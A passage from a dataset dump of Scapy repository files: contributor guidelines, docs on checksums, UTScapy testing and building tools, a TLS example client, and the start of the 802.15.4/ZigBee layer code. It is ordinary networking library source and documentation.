Packet().__init__() is called each time a **layer** is\nparsed from a string (during a network capture or a PCAP file\nread). Adding inefficient code here will have a disastrous effect on\nScapy's performances.\n\n### Python 2 and 3 compatibility\n\nThe project aims to provide code that works both on Python 2 and Python 3. Therefore, some rules need to be applied to achieve compatibility:\n- byte-string must be defined as `b\"\\x00\\x01\\x02\"`\n- exceptions must comply with the new Python 3 format: `except SomeError as e:`\n- lambdas must be written using a single argument when using tuples: use `lambda x, y: x + f(y)` instead of `lambda (x, y): x + f(y)`.\n- use int instead of long\n- use list comprehension instead of map() and filter()\n- use scapy.modules.six.range instead of xrange and range\n- use scapy.modules.six.itervalues(dict) instead of dict.values() or dict.itervalues()\n- use scapy.modules.six.string_types instead of basestring\n- `__bool__ = __nonzero__` must be used when declaring `__nonzero__` methods\n- `io.BytesIO` must be used instead of `StringIO` when using bytes\n- `__cmp__` must not be used.\n- UserDict should be imported via `six.UserDict`\n\n### Code review\n\nMaintainers tend to be picky, and you might feel frustrated that your\ncode (which is perfectly working in your use case) is not merged\nfaster.\n\nPlease don't be offended, and keep in mind that maintainers are\nconcerned about code maintainability and readability, commit history\n(we use the history a lot, for example to find regressions or\nunderstand why certain decisions have been made), performances,\nintegration in Scapy, API consistency (so that someone who knows how\nto use Scapy will know how to use your code), etc.\n\n**Thanks for reading, happy hacking!**\n" }, { "alpha_fraction": 0.6511628031730652, "alphanum_fraction": 0.680232584476471, "avg_line_length": 23.428571701049805, "blob_id": "46683d64f4e47752948542b80bcc9cf3744393bd", "content_id": "1b5e2a931c9dd57492caac736d151419500654d4", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 172, "license_type": "permissive", "max_line_length": 50, "num_lines": 7, "path": "/scapy/test/tls/__init__.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "## This file is part of Scapy\n## Copyright (C) 2016 Maxence Tury <maxence.tury@ssi.gouv.fr>\n## This program is published under a GPLv2 license\n\n\"\"\"\nExamples and test PKI for the TLS module.\n\"\"\"\n\n" }, { "alpha_fraction": 0.6515411138534546, "alphanum_fraction": 0.6909246444702148, "avg_line_length": 33.35293960571289, "blob_id": "c22038e4ac24ee5636fdc31869607b726d82e4e5", "content_id": "5f222d947362ca8cf395e2e7d093fc5aadbcf853", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1168, "license_type": "permissive", "max_line_length": 105, "num_lines": 34, "path": "/scapy/doc/scapy/functions.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "***********************\nCalling Scapy functions\n***********************\n\nThis section provides some examples that show how to benefit from Scapy\nfunctions in your own code.\n\nUDP checksum\n============\n\nThe following example explains how to use the checksum() function to compute and\nUDP checksum manually. The following steps must be performed:\n\n1. compute the UDP pseudo header as described in RFC768\n2. build a UDP packet with Scapy with p[UDP].chksum=0\n3. call checksum() with the pseudo header and the UDP packet\n\n::\n\n from scapy.all import *\n\n # Get the UDP checksum computed by Scapy\n packet = IP(dst=\"10.11.12.13\", src=\"10.11.12.14\")/UDP()/DNS()\n packet = IP(raw(packet)) # Build packet (automatically done when sending)\n checksum_scapy = packet[UDP].chksum\n\n # Set the UDP checksum to 0 and compute the checksum 'manually'\n packet = IP(dst=\"10.11.12.13\", src=\"10.11.12.14\")/UDP(chksum=0)/DNS()\n packet_raw = raw(packet)\n udp_raw = packet_raw[20:]\n # in4_chksum is used to automatically build a pseudo-header\n chksum = in4_chksum(socket.IPPROTO_UDP, packet[IP], udp_raw) # For more infos, call \"help(in4_chksum)\"\n\n assert(checksum_scapy == chksum)\n" }, { "alpha_fraction": 0.6491255760192871, "alphanum_fraction": 0.6563866138458252, "avg_line_length": 51.49180221557617, "blob_id": "7dd4daddc3f9a996cdf3cd4c090ee0bef1305ba6", "content_id": "44a59b8d7318c002250f1937f08340075d5a1c15", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 12874, "license_type": "permissive", "max_line_length": 883, "num_lines": 244, "path": "/scapy/doc/scapy/development.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "*****************\nScapy development\n*****************\n\nProject organization\n====================\n\nScapy development uses the Git version control system. Scapy's\nreference repository is at https://github.com/secdev/scapy/.\n\nProject management is done with `Github\n<https://github.com/secdev/scapy/>`_. It provides a freely editable\n`Wiki <https://github.com/secdev/scapy/wiki/>`_ (please contribute!)\nthat can reference tickets, changesets, files from the project. It\nalso provides a ticket management service that is used to avoid\nforgetting patches or bugs.\n\nHow to contribute\n=================\n\n* Found a bug in Scapy? `Add a ticket <https://github.com/secdev/scapy/issues/new>`_.\n* Improve this documentation.\n* Program a new layer and share it on the mailing list, or create a pull request.\n* Contribute new `regression tests <https://github.com/secdev/scapy/wiki/Contrib:-RegressionTests>`_.\n* Upload packet samples for new protocols on the `packet samples page\n <https://github.com/secdev/scapy/wiki/Contrib:-PacketSamples>`_.\n\n\nImprove the documentation\n=========================\n\nThe documentation can be improved in several ways by:\n\n* Adding docstrings to the source code.\n* Adding usage examples to the documentation.\n\nAdding Docstrings\n-----------------\nThe Scapy source code has few explanations of what a function is doing. A docstring, by adding explanation and\nexpected input and output parameters, helps saving time for both the layer developers and the users looking for\nadvanced features.\n\nAn example of docstring from the ``scapy.fields.FlagsField`` class: ::\n\n class FlagsField(BitField):\n \"\"\" Handle Flag type field\n\n Make sure all your flags have a label\n\n Example:\n >>> from scapy.packet import Packet\n >>> class FlagsTest(Packet):\n fields_desc = [FlagsField(\"flags\", 0, 8, [\"f0\", \"f1\", \"f2\", \"f3\", \"f4\", \"f5\", \"f6\", \"f7\"])]\n >>> FlagsTest(flags=9).show2()\n ###[ FlagsTest ]###\n flags = f0+f3\n >>> FlagsTest(flags=0).show2().strip()\n ###[ FlagsTest ]###\n flags =\n\n :param name: field's name\n :param default: default value for the field\n :param size: number of bits in the field\n :param names: (list or dict) label for each flag, Least Significant Bit tag's name is written first\n \"\"\"\n\nIt will contain a short one-line description of the class followed by some indications about its usage.\nYou can add a usage example if it makes sense using the `doctest <https://docs.python.org/2.7/library/doctest.html>`_ format.\nFinally, the classic python signature can be added following the `sphinx documentation <http://www.sphinx-doc.org/en/stable/domains.html#python-signatures>`_.\n\nThis task works in pair with writing non regression unit tests.\n\nDocumentation\n-------------\nA way to improve the documentation content is by keeping it up to date with the latest version of Scapy. You can also help by adding usage examples of your own or directly gathered from existing online Scapy presentations.\n\nTesting with UTScapy\n====================\n\nWhat is UTScapy?\n----------------\n\nUTScapy is a small Python program that reads a campaign of tests, runs the campaign with Scapy and generates a report indicating test status. The report may be in one of four formats, text, ansi, HTML or LaTeX.\n\nThree basic test containers exist with UTScapy, a unit test, a test set and a test campaign. A unit test is a list of Scapy commands that will be run by Scapy or a derived work of Scapy. Evaluation of the last command in the unit test will determine the end result of the individual unit test. A test set is a group of unit tests with some association. A test campaign consists of one or more test sets. Test sets and unit tests can be given keywords to form logical groupings. When running a campaign, tests may be selected by keyword. This allows the user to run tests within the desired grouping.\n\nFor each unit test, test set and campaign, a CRC32 of the test is calculated and displayed as a signature of that test. This test signature is sufficient to determine that the actual test run was the one expected and not one that has been modified. In case your dealing with evil people that try to modify or corrupt the file without changing the CRC32, a global SHA1 is computed on the whole file.\n\nSyntax of a Test Campaign\n-------------------------\n\nTable 1 shows the syntax indicators that UTScapy is looking for. The syntax specifier must appear as the first character of each line of the text file that defines the test. Text descriptions that follow the syntax specifier are arguments interpreted by UTScapy. Lines that appear without a leading syntax specifier will be treated as Python commands, provided they appear in the context of a unit test. Lines without a syntax specifier that appear outside the correct context will be rejected by UTScapy and a warning will be issued. \n\n================ =================\nSyntax Specifier Definition\n================ =================\n‘%’ Give the test campaign's name.\n‘+’ Announce a new test set.\n‘=’ Announce a new unit test.\n‘~’ Announce keywords for the current unit test.\n‘*’ Denotes a comment that will be included in the report.\n‘#’ Testcase annotations that are discarded by the interpreter.\n================ =================\n\nTable 1 - UTScapy Syntax Specifiers\n\nComments placed in the test report have a context. Each comment will be associated with the last defined test container - be it an individual unit test, a test set or a test campaign. Multiple comments associated with a particular container will be concatenated together and will appear in the report directly after the test container announcement. General comments for a test file should appear before announcing a test campaign. For comments to be associated with a test campaign, they must appear after the declaration of the test campaign but before any test set or unit test. Comments for a test set should appear before the definition of the set’s first unit test.\n\nThe generic format for a test campaign is shown in the following table::\n\n % Test Campaign Name\n * Comment describing this campaign\n\n \n + Test Set 1\n * comments for test set 1\n \n = Unit Test 1\n ~ keywords\n * Comments for unit test 1\n # Python statements follow\n a = 1\n print a\n a == 1\n\n\nPython statements are identified by the lack of a defined UTScapy syntax specifier. The Python statements are fed directly to the Python interpreter as if one is operating within the interactive Scapy shell (``interact``). Looping, iteration and conditionals are permissible but must be terminated by a blank line. A test set may be comprised of multiple unit tests and multiple test sets may be defined for each campaign. It is even possible to have multiple test campaigns in a particular test definition file. The use of keywords allows testing of subsets of the entire campaign. For example, during the development of a test campaign, the user may wish to mark new tests under development with the keyword “debug”. Once the tests run successfully to their desired conclusion, the keyword “debug” could be removed. Keywords such as “regression” or “limited” could be used as well.\n\nIt is important to note that UTScapy uses the truth value from the last Python statement as the indicator as to whether a test passed or failed. Multiple logical tests may appear on the last line. If the result is 0 or False, the test fails. Otherwise, the test passes. Use of an assert() statement can force evaluation of intermediate values if needed.\n\nThe syntax for UTScapy is shown in Table 3 - UTScapy command line syntax::\n\n [root@localhost scapy]# ./UTscapy.py –h\n Usage: UTscapy [-m module] [-f {text|ansi|HTML|LaTeX}] [-o output_file]\n [-t testfile] [-k keywords [-k ...]] [-K keywords [-K ...]]\n [-l] [-d|-D] [-F] [-q[q]]\n -l : generate local files\n -F : expand only failed tests\n -d : dump campaign\n -D : dump campaign and stop\n -C : don't calculate CRC and SHA\n -q : quiet mode\n -qq : [silent mode]\n -n <testnum> : only tests whose numbers are given (eg. 1,3-7,12)\n -m <module> : additional module to put in the namespace\n -k <kw1>,<kw2>,... : include only tests with one of those keywords (can be used many times)\n -K <kw1>,<kw2>,... : remove tests with one of those keywords (can be used many times)\n\nTable 3 - UTScapy command line syntax\n\nAll arguments are optional. Arguments that have no associated argument value may be strung together (i.e. ``–lqF``). If no testfile is specified, the test definition comes from <STDIN>. Similarly, if no output file is specified it is directed to <STDOUT>. The default output format is “ansi”. Table 4 lists the arguments, the associated argument value and their meaning to UTScapy.\n\n========== ============== =============================================================================\nArgument Argument Value Meaning to UTScapy\n========== ============== =============================================================================\n-t testfile Input test file defining test campaign (default = <STDIN>)\n-o output_file File for output of test campaign results (default = <STDOUT>)\n-f test ansi, HTML, LaTeX, Format out output report (default = ansi)\n-l Generate report associated files locally. For HTML, generates JavaScript \n and the style sheet\n-F Failed test cases will be initially expanded by default in HTML output\n-d Print a terse listing of the campaign before executing the campaign\n-D Print a terse listing of the campaign and stop. Do not execute campaign\n-C Do not calculate test signatures\n-q Do not update test progress to the screen as tests are executed\n-qq Silent mode\n-n testnum Execute only those tests listed by number. Test numbers may be\n retrieved using –d or –D. Tests may be listed as a comma\n separated list and may include ranges (e.g. 1, 3-7, 12)\n-m module Load module before executing tests. Useful in testing derived works of Scapy.\n Note: Derived works that are intended to execute as \"__main__\" will not be\n invoked by UTScapy as “__main__”.\n-k kw1, kw2, ... Include only tests with keyword “kw1”. Multiple keywords may be specified.\n-K kw1, kw2, ... Exclude tests with keyword “kw1”. Multiple keywords may be specified. \n========== ============== =============================================================================\n\nTable 4 - UTScapy parameters\n\nTable 5 shows a simple test campaign with multiple tests set definitions. Additionally, keywords are specified that allow a limited number of test cases to be executed. Notice the use of the ``assert()`` statement in test 3 and 5 used to check intermediate results. Tests 2 and 5 will fail by design.\n\n:: \n\n % Example Test Campaign\n \n # Comment describing this campaign\n #\n # To run this campaign, try:\n # ./UTscapy.py -t example_campaign.txt -f html -o example_campaign.html -F\n #\n \n * This comment is associated with the test campaign and will appear \n * in the produced output.\n \n + Test Set 1\n \n = Unit Test 1\n ~ test_set_1 simple\n a = 1\n print a\n \n = Unit test 2\n ~ test_set_1 simple\n * this test will fail\n b = 2\n a == b\n \n = Unit test 3\n ~ test_set_1 harder\n a = 1\n b = 2\n c = \"hello\"\n assert (a != b)\n c == \"hello\"\n \n + Test Set 2\n \n = Unit Test 4\n ~ test_set_2 harder\n b = 2\n d = b\n d is b\n \n = Unit Test 5\n ~ test_set_2 harder hardest\n a = 2\n b = 3\n d = 4\n e = (a * b)**d\n # The following statement evaluates to False but is not last; continue\n e == 6\n # assert evaluates to False; stop test and fail\n assert (e == 7)\n e == 1296\n \n = Unit Test 6\n ~ test_set_2 hardest\n print e\n e == 1296\n\nTo see an example that is targeted to Scapy, go to http://www.secdev.org/projects/UTscapy. Cut and paste the example at the bottom of the page to the file ``demo_campaign.txt`` and run UTScapy against it::\n\n./test/run_tests -t demo_campaign.txt -f html -o demo_campaign.html -F -l\n\nExamine the output generated in file ``demo_campaign.html``.\n" }, { "alpha_fraction": 0.6238797307014465, "alphanum_fraction": 0.6441168189048767, "avg_line_length": 34.96875, "blob_id": "5653a0407c4088c561db76a528631963ef6215f3", "content_id": "410af8e11f381fd6430ca3e33e957346e0194b82", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3459, "license_type": "permissive", "max_line_length": 269, "num_lines": 96, "path": "/scapy/doc/scapy/extending.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "********************\nBuild your own tools\n********************\n\nYou can use Scapy to make your own automated tools. You can also extend Scapy without having to edit its source file.\n\nIf you have built some interesting tools, please contribute back to the github wiki !\n\n \nUsing Scapy in your tools\n=========================\nYou can easily use Scapy in your own tools. Just import what you need and do it.\n\nThis first example takes an IP or a name as first parameter, send an ICMP echo request packet and display the completely dissected return packet::\n\n #! /usr/bin/env python\n \n import sys\n from scapy.all import sr1,IP,ICMP\n \n p=sr1(IP(dst=sys.argv[1])/ICMP())\n if p:\n p.show()\n\nThis is a more complex example which does an ARP ping and reports what it found with LaTeX formatting::\n\n #! /usr/bin/env python\n # arping2tex : arpings a network and outputs a LaTeX table as a result\n \n import sys\n if len(sys.argv) != 2:\n print \"Usage: arping2tex <net>\\n eg: arping2tex 192.168.1.0/24\"\n sys.exit(1)\n \n from scapy.all import srp,Ether,ARP,conf\n conf.verb=0\n ans,unans=srp(Ether(dst=\"ff:ff:ff:ff:ff:ff\")/ARP(pdst=sys.argv[1]),\n timeout=2)\n \n print r\"\\begin{tabular}{|l|l|}\"\n print r\"\\hline\"\n print r\"MAC & IP\\\\\"\n print r\"\\hline\"\n for snd,rcv in ans:\n print rcv.sprintf(r\"%Ether.src% & %ARP.psrc%\\\\\")\n print r\"\\hline\"\n print r\"\\end{tabular}\"\n\nHere is another tool that will constantly monitor all interfaces on a machine and print all ARP request it sees, even on 802.11 frames from a Wi-Fi card in monitor mode. Note the store=0 parameter to sniff() to avoid storing all packets in memory for nothing::\n\n #! /usr/bin/env python\n from scapy.all import *\n \n def arp_monitor_callback(pkt):\n if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at\n return pkt.sprintf(\"%ARP.hwsrc% %ARP.psrc%\")\n \n sniff(prn=arp_monitor_callback, filter=\"arp\", store=0)\n\nFor a real life example, you can check `Wifitap <http://sid.rstack.org/static/articles/w/i/f/Wifitap_EN_9613.html>`_.\n\n\nExtending Scapy with add-ons\n============================\n\nIf you need to add some new protocols, new functions, anything, you can write it directly into Scapy's source file. But this is not very convenient. Even if those modifications are to be integrated into Scapy, it can be more convenient to write them in a separate file.\n\nOnce you've done that, you can launch Scapy and import your file, but this is still not very convenient. Another way to do that is to make your file executable and have it call the Scapy function named interact()::\n\n #! /usr/bin/env python\n \n # Set log level to benefit from Scapy warnings\n import logging\n logging.getLogger(\"scapy\").setLevel(1)\n \n from scapy.all import *\n \n class Test(Packet):\n name = \"Test packet\"\n fields_desc = [ ShortField(\"test1\", 1),\n ShortField(\"test2\", 2) ]\n \n def make_test(x,y):\n return Ether()/IP()/Test(test1=x,test2=y)\n \n if __name__ == \"__main__\":\n interact(mydict=globals(), mybanner=\"Test add-on v3.14\")\n\n\nIf you put the above listing in the test_interact.py file and make it executable, you'll get::\n\n # ./test_interact.py \n Welcome to Scapy (0.9.17.109beta)\n Test add-on v3.14\n >>> make_test(42,666)\n <Ether type=0x800 |<IP |<Test test1=42 test2=666 |>>>\n \n\n" }, { "alpha_fraction": 0.6433120965957642, "alphanum_fraction": 0.6719745397567749, "avg_line_length": 27.515151977539062, "blob_id": "0e2b2ffc339615b5b5ddcdd2fd5524d191cc0a4c", "content_id": "31a1fcefd2be1b0f16afb19604e5775136ff6997", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 942, "license_type": "permissive", "max_line_length": 75, "num_lines": 33, "path": "/scapy/test/tls/example_client.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n## This file is part of Scapy\n## This program is published under a GPLv2 license\n\n\"\"\"\nBasic TLS client. A ciphersuite may be commanded via a first argument.\nDefault protocol version is TLS 1.2.\n\nFor instance, \"sudo ./client_simple.py c014\" will try to connect to any TLS\nserver at 127.0.0.1:4433, with suite TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA.\n\"\"\"\n\nimport os\nimport sys\n\nbasedir = os.path.abspath(os.path.join(os.path.dirname(__file__),\"../../\"))\nsys.path=[basedir]+sys.path\n\nfrom scapy.layers.tls.automaton_cli import TLSClientAutomaton\nfrom scapy.layers.tls.handshake import TLSClientHello\n\n\nif len(sys.argv) == 2:\n ch = TLSClientHello(ciphers=int(sys.argv[1], 16))\nelse:\n ch = None\n\nt = TLSClientAutomaton(client_hello=ch,\n version=\"tls13-d18\",\n mycert=basedir+\"/test/tls/pki/cli_cert.pem\",\n mykey=basedir+\"/test/tls/pki/cli_key.pem\")\nt.run()\n\n" }, { "alpha_fraction": 0.5714829564094543, "alphanum_fraction": 0.6197667717933655, "avg_line_length": 41.534217834472656, "blob_id": "93b9253f1293d02e988fff26f76297f3ecbdb0a1", "content_id": "18f27a73c52c4545e612ac002be8547a0cab383b", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 57804, "license_type": "permissive", "max_line_length": 187, "num_lines": 1359, "path": "/scapy/scapy/layers/dot15d4.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This program is published under a GPLv2 license\n# This file is part of Scapy\n# See http://www.secdev.org/projects/scapy for more informations\n# Copyright (C) Ryan Speers <ryan@rmspeers.com> 2011-2012\n# Copyright (C) Roger Meyer <roger.meyer@csus.edu>: 2012-03-10 Added frames\n# Copyright (C) Gabriel Potter <gabriel@potter.fr>: 2018\n# Intern at INRIA Grand Nancy Est\n# This program is published under a GPLv2 license\n\n\"\"\"\nWireless MAC according to IEEE 802.15.4.\n\"\"\"\n\nimport re\nimport struct\n\nfrom scapy.compat import orb, raw\n\nfrom scapy.packet import *\nfrom scapy.fields import *\n\nfrom scapy.layers.ntp import TimeStampField\nfrom scapy.layers.inet import UDP\n\n# ZigBee Cluster Library Identifiers, Table 2.2 ZCL\n_zcl_cluster_identifier = {\n # Functional Domain: General\n 0x0000: \"basic\",\n 0x0001: \"power_configuration\",\n 0x0002: \"device_temperature_configuration\",\n 0x0003: \"identify\",\n 0x0004: \"groups\",\n 0x0005: \"scenes\",\n 0x0006: \"on_off\",\n 0x0007: \"on_off_switch_configuration\",\n 0x0008: \"level_control\",\n 0x0009: \"alarms\",\n 0x000a: \"time\",\n 0x000b: \"rssi_location\",\n 0x000c: \"analog_input\",\n 0x000d: \"analog_output\",\n 0x000e: \"analog_value\",\n 0x000f: \"binary_input\",\n 0x0010: \"binary_output\",\n 0x0011: \"binary_value\",\n 0x0012: \"multistate_input\",\n 0x0013: \"multistate_output\",\n 0x0014: \"multistate_value\",\n 0x0015: \"commissioning\",\n # 0x0016 - 0x00ff reserved\n # Functional Domain: Closures\n 0x0100: \"shade_configuration\",\n # 0x0101 - 0x01ff reserved\n # Functional Domain: HVAC\n 0x0200: \"pump_configuration_and_control\",\n 0x0201: \"thermostat\",\n 0x0202: \"fan_control\",\n 0x0203: \"dehumidification_control\",\n 0x0204: \"thermostat_user_interface_configuration\",\n # 0x0205 - 0x02ff reserved\n # Functional Domain: Lighting\n 0x0300: \"color_control\",\n 0x0301: \"ballast_configuration\",\n # Functional Domain: Measurement and sensing\n 0x0400: \"illuminance_measurement\",\n 0x0401: \"illuminance_level_sensing\",\n 0x0402: \"temperature_measurement\",\n 0x0403: \"pressure_measurement\",\n 0x0404: \"flow_measurement\",\n 0x0405: \"relative_humidity_measurement\",\n 0x0406: \"occupancy_sensing\",\n # Functional Domain: Security and safethy\n 0x0500: \"ias_zone\",\n 0x0501: \"ias_ace\",\n 0x0502: \"ias_wd\",\n # Functional Domain: Protocol Interfaces\n 0x0600: \"generic_tunnel\",\n 0x0601: \"bacnet_protocol_tunnel\",\n 0x0602: \"analog_input_regular\",\n 0x0603: \"analog_input_extended\",\n 0x0604: \"analog_output_regular\",\n 0x0605: \"analog_output_extended\",\n 0x0606: \"analog_value_regular\",\n 0x0607: \"analog_value_extended\",\n 0x0608: \"binary_input_regular\",\n 0x0609: \"binary_input_extended\",\n 0x060a: \"binary_output_regular\",\n 0x060b: \"binary_output_extended\",\n 0x060c: \"binary_value_regular\",\n 0x060d: \"binary_value_extended\",\n 0x060e: \"multistate_input_regular\",\n 0x060f: \"multistate_input_extended\",\n 0x0610: \"multistate_output_regular\",\n 0x0611: \"multistate_output_extended\",\n 0x0612: \"multistate_value_regular\",\n 0x0613: \"multistate_value\",\n # Smart Energy Profile Clusters\n 0x0700: \"price\",\n 0x0701: \"demand_response_and_load_control\",\n 0x0702: \"metering\",\n 0x0703: \"messaging\",\n 0x0704: \"smart_energy_tunneling\",\n 0x0705: \"prepayment\",\n # Functional Domain: General\n # Key Establishment\n 0x0800: \"key_establishment\",\n}\n\n# ZigBee stack profiles\n_zcl_profile_identifier = {\n 0x0000: \"ZigBee_Stack_Profile_1\",\n 0x0101: \"IPM_Industrial_Plant_Monitoring\",\n 0x0104: \"HA_Home_Automation\",\n 0x0105: \"CBA_Commercial_Building_Automation\",\n 0x0107: \"TA_Telecom_Applications\",\n 0x0108: \"HC_Health_Care\",\n 0x0109: \"SE_Smart_Energy_Profile\",\n}\n\n# ZigBee Cluster Library, Table 2.8 ZCL Command Frames\n_zcl_command_frames = {\n 0x00: \"read_attributes\",\n 0x01: \"read_attributes_response\",\n 0x02: \"write_attributes_response\",\n 0x03: \"write_attributes_undivided\",\n 0x04: \"write_attributes_response\",\n 0x05: \"write_attributes_no_response\",\n 0x06: \"configure_reporting\",\n 0x07: \"configure_reporting_response\",\n 0x08: \"read_reporting_configuration\",\n 0x09: \"read_reporting_configuration_response\",\n 0x0a: \"report_attributes\",\n 0x0b: \"default_response\",\n 0x0c: \"discover_attributes\",\n 0x0d: \"discover_attributes_response\",\n # 0x0e - 0xff Reserved\n}\n\n# ZigBee Cluster Library, Table 2.16 Enumerated Status Values\n_zcl_enumerated_status_values = {\n 0x00: \"SUCCESS\",\n 0x02: \"FAILURE\",\n # 0x02 - 0x7f Reserved\n 0x80: \"MALFORMED_COMMAND\",\n 0x81: \"UNSUP_CLUSTER_COMMAND\",\n 0x82: \"UNSUP_GENERAL_COMMAND\",\n 0x83: \"UNSUP_MANUF_CLUSTER_COMMAND\",\n 0x84: \"UNSUP_MANUF_GENERAL_COMMAND\",\n 0x85: \"INVALID_FIELD\",\n 0x86: \"UNSUPPORTED_ATTRIBUTE\",\n 0x87: \"INVALID_VALUE\",\n 0x88: \"READ_ONLY\",\n 0x89: \"INSUFFICIENT_SPACE\",\n 0x8a: \"DUPLICATE_EXISTS\",\n 0x8b: \"NOT_FOUND\",\n 0x8c: \"UNREPORTABLE_ATTRIBUTE\",\n 0x8d: \"INVALID_DATA_TYPE\",\n # 0x8e - 0xbf Reserved\n 0xc0: \"HARDWARE_FAILURE\",\n 0xc1: \"SOFTWARE_FAILURE\",\n 0xc2: \"CALIBRATION_ERROR\",\n # 0xc3 - 0xff Reserved\n}\n\n# ZigBee Cluster Library, Table 2.15 Data Types\n_zcl_attribute_data_types = {\n 0x00: \"no_data\",\n # General data\n 0x08: \"8-bit_data\",\n 0x09: \"16-bit_data\",\n 0x0a: \"24-bit_data\",\n 0x0b: \"32-bit_data\",\n 0x0c: \"40-bit_data\",\n 0x0d: \"48-bit_data\",\n 0x0e: \"56-bit_data\",\n 0x0f: \"64-bit_data\",\n # Logical\n 0x10: \"boolean\",\n # Bitmap\n 0x18: \"8-bit_bitmap\",\n 0x19: \"16-bit_bitmap\",\n 0x1a: \"24-bit_bitmap\",\n 0x1b: \"32-bit_bitmap\",\n 0x1c: \"40-bit_bitmap\",\n 0x1d: \"48-bit_bitmap\",\n 0x1e: \"56-bit_bitmap\",\n 0x1f: \"64-bit_bitmap\",\n # Unsigned integer\n 0x20: \"Unsigned_8-bit_integer\",\n 0x21: \"Unsigned_16-bit_integer\",\n 0x22: \"Unsigned_24-bit_integer\",\n 0x23: \"Unsigned_32-bit_integer\",\n 0x24: \"Unsigned_40-bit_integer\",\n 0x25: \"Unsigned_48-bit_integer\",\n 0x26: \"Unsigned_56-bit_integer\",\n 0x27: \"Unsigned_64-bit_integer\",\n # Signed integer\n 0x28: \"Signed_8-bit_integer\",\n 0x29: \"Signed_16-bit_integer\",\n 0x2a: \"Signed_24-bit_integer\",\n 0x2b: \"Signed_32-bit_integer\",\n 0x2c: \"Signed_40-bit_integer\",\n 0x2d: \"Signed_48-bit_integer\",\n 0x2e: \"Signed_56-bit_integer\",\n 0x2f: \"Signed_64-bit_integer\",\n # Enumeration\n 0x30: \"8-bit_enumeration\",\n 0x31: \"16-bit_enumeration\",\n # Floating point\n 0x38: \"semi_precision\",\n 0x39: \"single_precision\",\n 0x3a: \"double_precision\",\n # String\n 0x41: \"octet-string\",\n 0x42: \"character_string\",\n 0x43: \"long_octet_string\",\n 0x44: \"long_character_string\",\n # Ordered sequence\n 0x48: \"array\",\n 0x4c: \"structure\",\n # Collection\n 0x50: \"set\",\n 0x51: \"bag\",\n # Time\n 0xe0: \"time_of_day\",\n 0xe1: \"date\",\n 0xe2: \"utc_time\",\n # Identifier\n 0xe8: \"cluster_id\",\n 0xe9: \"attribute_id\",\n 0xea: \"bacnet_oid\",\n # Miscellaneous\n 0xf0: \"ieee_address\",\n 0xf1: \"128-bit_security_key\",\n # Unknown\n 0xff: \"unknown\",\n}\n\n# Fields #\n\n\nclass dot15d4AddressField(Field):\n __slots__ = [\"adjust\", \"length_of\"]\n\n def __init__(self, name, default, length_of=None, fmt=\"<H\", adjust=None):\n Field.__init__(self, name, default, fmt)\n self.length_of = length_of\n if adjust is not None:\n self.adjust = adjust\n else:\n self.adjust = lambda pkt, x: self.lengthFromAddrMode(pkt, x)\n\n def i2repr(self, pkt, x):\n \"\"\"Convert internal value to a nice representation\"\"\"\n if len(hex(self.i2m(pkt, x))) < 7: # short address\n return hex(self.i2m(pkt, x))\n else: # long address\n x = \"%016x\" % self.i2m(pkt, x)\n return \":\".join([\"%s%s\" % (x[i], x[i + 1]) for i in range(0, len(x), 2)])\n\n def addfield(self, pkt, s, val):\n \"\"\"Add an internal value to a string\"\"\"\n if self.adjust(pkt, self.length_of) == 2:\n return s + struct.pack(self.fmt[0] + \"H\", val)\n elif self.adjust(pkt, self.length_of) == 8:\n return s + struct.pack(self.fmt[0] + \"Q\", val)\n else:\n return s\n\n def getfield(self, pkt, s):\n if self.adjust(pkt, self.length_of) == 2:\n return s[2:], self.m2i(pkt, struct.unpack(self.fmt[0] + \"H\", s[:2])[0])\n elif self.adjust(pkt, self.length_of) == 8:\n return s[8:], self.m2i(pkt, struct.unpack(self.fmt[0] + \"Q\", s[:8])[0])\n else:\n raise Exception('impossible case')\n\n def lengthFromAddrMode(self, pkt, x):\n addrmode = 0\n pkttop = pkt.underlayer\n while True:\n try:\n addrmode = pkttop.getfieldval(x)\n break\n except:\n if pkttop.underlayer is None:\n break\n pkttop = pkttop.underlayer\n # print \"Underlayer field value of\", x, \"is\", addrmode\n if addrmode == 2:\n return 2\n elif addrmode == 3:\n return 8\n return 0\n\n\n# class dot15d4Checksum(LEShortField,XShortField):\n# def i2repr(self, pkt, x):\n# return XShortField.i2repr(self, pkt, x)\n# def addfield(self, pkt, s, val):\n# return s\n# def getfield(self, pkt, s):\n# return s\n\n\n# Layers #\n\nclass Dot15d4(Packet):\n name = \"802.15.4\"\n fields_desc = [\n BitField(\"fcf_reserved_1\", 0, 1), # fcf p1 b1\n BitEnumField(\"fcf_panidcompress\", 0, 1, [False, True]),\n BitEnumField(\"fcf_ackreq\", 0, 1, [False, True]),\n BitEnumField(\"fcf_pending\", 0, 1, [False, True]),\n BitEnumField(\"fcf_security\", 0, 1, [False, True]), # fcf p1 b2\n Emph(BitEnumField(\"fcf_frametype\", 0, 3, {0: \"Beacon\", 1: \"Data\", 2: \"Ack\", 3: \"Command\"})),\n BitEnumField(\"fcf_srcaddrmode\", 0, 2, {0: 